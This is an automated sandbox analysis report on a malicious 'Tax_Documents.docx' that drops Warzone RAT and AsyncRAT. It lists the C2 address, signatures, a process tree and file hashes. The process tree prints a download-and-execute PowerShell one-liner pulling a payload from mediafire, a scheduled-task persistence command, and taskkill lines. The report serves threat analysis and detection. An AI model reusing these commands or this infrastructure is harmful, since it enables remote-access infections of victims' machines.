Analysis

  • max time kernel
    119s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    06-04-2022 17:17

General

  • Target

    Tax_Documents.docx

  • Size

    290KB

  • MD5

    e7bc410788af86fe5e41695dd0ae308b

  • SHA1

    8d9f55c90db961ea66993fd03e148b0dc9bcec5b

  • SHA256

    8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

  • SHA512

    2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

Malware Config

Extracted

Family

warzonerat

C2

mubbibun.duckdns.org:999

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Async RAT payload 3 IoCs
  • Warzone RAT Payload 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tax_Documents.docx" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:4216
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      1⤵
      • Modifies data under HKEY_USERS
      PID:772
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1440
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Public\update.js
      1⤵
      • Process spawned unexpected child process
      PID:764
    • C:\ProgramData\ddond.com
      C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
      1⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
        2⤵
        • Creates scheduled task(s)
        PID:900
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5008
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4632
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:568
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1512
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Public\update.js
      1⤵
      • Process spawned unexpected child process
      PID:4924
    • C:\ProgramData\ESETNONU.com
      C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4420
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.cmdline"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4596
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71E5.tmp" "c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\CSC868DADD53EA447D2B2C84465D8AF891.TMP"
          3⤵
            PID:3496
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
          2⤵
            PID:1036
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 520
              3⤵
              • Program crash
              PID:1700
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            2⤵
              PID:448
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              2⤵
                PID:3312
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 520
                  3⤵
                  • Program crash
                  PID:1480
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                2⤵
                  PID:4180
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 520
                    3⤵
                    • Program crash
                    PID:3892
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                  2⤵
                    PID:3500
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                    2⤵
                      PID:1392
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 520
                        3⤵
                        • Program crash
                        PID:4596
                    • C:\ProgramData\hahahha.sdasd~txt
                      "C:\ProgramData\hahahha.sdasd~txt"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:556
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3312 -ip 3312
                    1⤵
                      PID:2316
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1392 -ip 1392
                      1⤵
                        PID:2664
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3500 -ip 3500
                        1⤵
                          PID:1032
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1036 -ip 1036
                          1⤵
                            PID:4104
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4180 -ip 4180
                            1⤵
                              PID:4284

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\ESETNONU.com

                              Filesize

                              442KB

                              MD5

                              04029e121a0cfa5991749937dd22a1d9

                              SHA1

                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                              SHA256

                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                              SHA512

                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                            • C:\ProgramData\ddond.com

                              Filesize

                              14KB

                              MD5

                              0b4340ed812dc82ce636c00fa5c9bef2

                              SHA1

                              51c97ebe601ef079b16bcd87af827b0be5283d96

                              SHA256

                              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                              SHA512

                              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                            • C:\ProgramData\ddond.com

                              Filesize

                              14KB

                              MD5

                              0b4340ed812dc82ce636c00fa5c9bef2

                              SHA1

                              51c97ebe601ef079b16bcd87af827b0be5283d96

                              SHA256

                              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                              SHA512

                              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                            • C:\ProgramData\hahahha.sdasd~txt

                              Filesize

                              313KB

                              MD5

                              55f92c397772b28ca0cd110a47cdef66

                              SHA1

                              d848821c21e08eacfbd531d64039bdb02888667b

                              SHA256

                              f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

                              SHA512

                              afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

                            • C:\ProgramData\hahahha.sdasd~txt

                              Filesize

                              313KB

                              MD5

                              55f92c397772b28ca0cd110a47cdef66

                              SHA1

                              d848821c21e08eacfbd531d64039bdb02888667b

                              SHA256

                              f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

                              SHA512

                              afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                              Filesize

                              471B

                              MD5

                              e5ddf14c4003d401d5621396447b4498

                              SHA1

                              f408e84f24bfcb24c08999ebd83eab25ff7ce758

                              SHA256

                              03666af8ef38e7e30596f885e4d7b3fd5e89cb50199c05fddcb9706242c0d7d3

                              SHA512

                              b64823ff2466afa7760523363251fd8bde76fd2e38dbf07b60af37043f116bac6b34be4af30d31885419de68f9bad70e54b7f027b8c4d9700c5ae0ada7d1c402

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                              Filesize

                              446B

                              MD5

                              7954b27e84bbf1c48ea652ab5bd31396

                              SHA1

                              4c9a2ba8cda6d135c9b0869d8c135746010b5a2f

                              SHA256

                              77dfdd0f20507d44fbcdd7196771784a84e9b102c8937cd195c56e603e412405

                              SHA512

                              c45cbae4ab7b7202f53f1df28e954a0aef7e7072f2561c2f0aa8e6a4a61f7d905dcc3863920f64682ab0685c192ef77c8234ea54bda7ea839b73ce894bcfc010

                            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CB3311F0-26B4-4485-B87F-4507267F8686

                              Filesize

                              142KB

                              MD5

                              cb2b24c6e966cd45143d0cfad596d946

                              SHA1

                              cb3c045c67f7e85c6600993a29a972da76a7213e

                              SHA256

                              3b5e1126c4f05d43b7e13ff4fbbf331448161181bf03b80f8d6222c990b9bb01

                              SHA512

                              47066bf6f759fac9d9585af1efb45530594bb78713f13799dafe8c30cb570613183e9ddc40aa1c8a888f98ca4a7807c2852a38697bd8ec93c31be3c1a536be5f

                            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                              Filesize

                              303KB

                              MD5

                              0e73fd13113616785de72a65790702a0

                              SHA1

                              004e11d2babe327942e19845c288bb42d885549f

                              SHA256

                              e22214c59a03a88a42a3e62270b9eff765e95e68b6f4cc03e1f0d0ee638b0266

                              SHA512

                              845cf0ecb6fb6b7ed73d9b21957f5a50d8fe8c62d3aa5211d43f24d47f1eb3a041bb84cc9373272c959c33ca0eba643dbec161319dbba7b3dec37ab241b32da3

                            • C:\Users\Admin\AppData\Local\Temp\RES71E5.tmp

                              Filesize

                              1KB

                              MD5

                              0ff9d2c0f0650b2b3b4fa158515148eb

                              SHA1

                              3a66561ed1485cf9f9342e91a302bea9cb801060

                              SHA256

                              109a33e9b47803c56a24af3480a3a5a6abaebb1c48269abc6a5a9d763907f4c5

                              SHA512

                              478084918aee36b36f05acc42414e0904550540e531355b26905f2d9321c061995ac3198280d91878e237ff4754bf4bb4e5ac6e78dc14b6ad7696ae470550489

                            • C:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.dll

                              Filesize

                              3KB

                              MD5

                              960a60140ea9fe4b1d18d5b07842715b

                              SHA1

                              df42771449aef60f939a9304e28359984038f5c5

                              SHA256

                              45ba550c0d67f539e789d7207236989ccca7b364c0c385aeff6e4fdd42e6676f

                              SHA512

                              6610cb1b4941a810b2988d47a419800991ed038eea25918cb4db8af8ec67810d771f7a302c786e1c37656e06fb80cca122c98f7951df9fc47b7f2a34f5c79f76

                            • C:\Users\Public\update.js

                              Filesize

                              1KB

                              MD5

                              b2a6eb01401e4a297b4e97a197af123d

                              SHA1

                              fb7334316dd8b4eba10121b023e7e35d68a8e6a6

                              SHA256

                              8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

                              SHA512

                              b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

                            • C:\Users\Public\update.js

                              Filesize

                              1KB

                              MD5

                              b2a6eb01401e4a297b4e97a197af123d

                              SHA1

                              fb7334316dd8b4eba10121b023e7e35d68a8e6a6

                              SHA256

                              8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

                              SHA512

                              b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

                            • \??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\CSC868DADD53EA447D2B2C84465D8AF891.TMP

                              Filesize

                              652B

                              MD5

                              2981ef920001cf36acd21222e874dc44

                              SHA1

                              08b70b98001559e3d03dc8f49fc12521cb6935df

                              SHA256

                              c4e6045b69b667b942d441faab2a43b38d027ba98cb09056244b0d0d028efb89

                              SHA512

                              73921993d2f7583701b62197b5ba869d736b2a6da1fdf960207f42c2e7bd9abcd9691fa31da5654f315a83dc69c7bde4e40d3ebb852b638bdd5246c8991235f4

                            • \??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.0.cs

                              Filesize

                              840B

                              MD5

                              268033bad46157d9949101dfdbd69f95

                              SHA1

                              14a7532c9470d058536ff71251abc55320dee08e

                              SHA256

                              17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

                              SHA512

                              09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

                            • \??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.cmdline

                              Filesize

                              369B

                              MD5

                              be7e26eac44c14e075eefa17bc9388f0

                              SHA1

                              c45394caa13ca909c5691ef2864ff03653cb4afa

                              SHA256

                              7430c968ed3ab1b9dc1dea3cd2b1fba5ec2fdd8445fb21f1a82d18cb6cc2edb6

                              SHA512

                              1382d15497cdde9fc1ce2a436f701f9cf05e52a86949498ae38bb8432288257c74cbd7396acfa081a64508902aaa826261fde354ed4de1d406bb42925311750c

                            • memory/556-201-0x0000000000000000-mapping.dmp

                            • memory/556-209-0x000000001B942000-0x000000001B944000-memory.dmp

                              Filesize

                              8KB

                            • memory/556-208-0x0000000002EC0000-0x0000000002EFC000-memory.dmp

                              Filesize

                              240KB

                            • memory/556-207-0x000000001B940000-0x000000001B942000-memory.dmp

                              Filesize

                              8KB

                            • memory/556-204-0x0000000000C80000-0x0000000000CD4000-memory.dmp

                              Filesize

                              336KB

                            • memory/556-205-0x00007FFCDAEA0000-0x00007FFCDB961000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/556-206-0x0000000001430000-0x0000000001442000-memory.dmp

                              Filesize

                              72KB

                            • memory/568-168-0x0000000000000000-mapping.dmp

                            • memory/900-165-0x0000000000000000-mapping.dmp

                            • memory/1036-181-0x0000000000400000-0x0000000000554000-memory.dmp

                              Filesize

                              1.3MB

                            • memory/1036-187-0x0000000000400000-0x0000000000554000-memory.dmp

                              Filesize

                              1.3MB

                            • memory/1036-182-0x0000000000405CE2-mapping.dmp

                            • memory/1392-198-0x0000000000405CE2-mapping.dmp

                            • memory/1440-162-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/1440-160-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/1440-161-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/1440-163-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3312-185-0x0000000000405CE2-mapping.dmp

                            • memory/3372-135-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3372-136-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3372-137-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3372-134-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3372-138-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3372-139-0x00007FFCC72A0000-0x00007FFCC72B0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3496-177-0x0000000000000000-mapping.dmp

                            • memory/3500-194-0x0000000000405CE2-mapping.dmp

                            • memory/4180-190-0x0000000000405CE2-mapping.dmp

                            • memory/4216-140-0x0000000000000000-mapping.dmp

                            • memory/4420-169-0x0000016C610D0000-0x0000016C610F2000-memory.dmp

                              Filesize

                              136KB

                            • memory/4420-170-0x00007FFCDAEA0000-0x00007FFCDB961000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4420-171-0x0000016C610C6000-0x0000016C610C8000-memory.dmp

                              Filesize

                              8KB

                            • memory/4420-172-0x0000016C610C0000-0x0000016C610C2000-memory.dmp

                              Filesize

                              8KB

                            • memory/4420-173-0x0000016C610C3000-0x0000016C610C5000-memory.dmp

                              Filesize

                              8KB

                            • memory/4596-174-0x0000000000000000-mapping.dmp

                            • memory/4632-167-0x0000000000000000-mapping.dmp

                            • memory/5008-166-0x0000000000000000-mapping.dmp